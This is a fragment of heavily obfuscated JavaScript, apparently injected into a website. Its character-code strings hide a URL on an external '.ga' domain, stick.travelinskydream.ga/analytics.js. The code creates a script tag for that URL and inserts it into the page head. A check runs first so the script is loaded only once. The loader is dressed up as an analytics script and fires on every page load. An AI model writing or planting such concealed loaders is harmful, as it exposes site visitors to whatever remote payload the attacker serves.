_0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();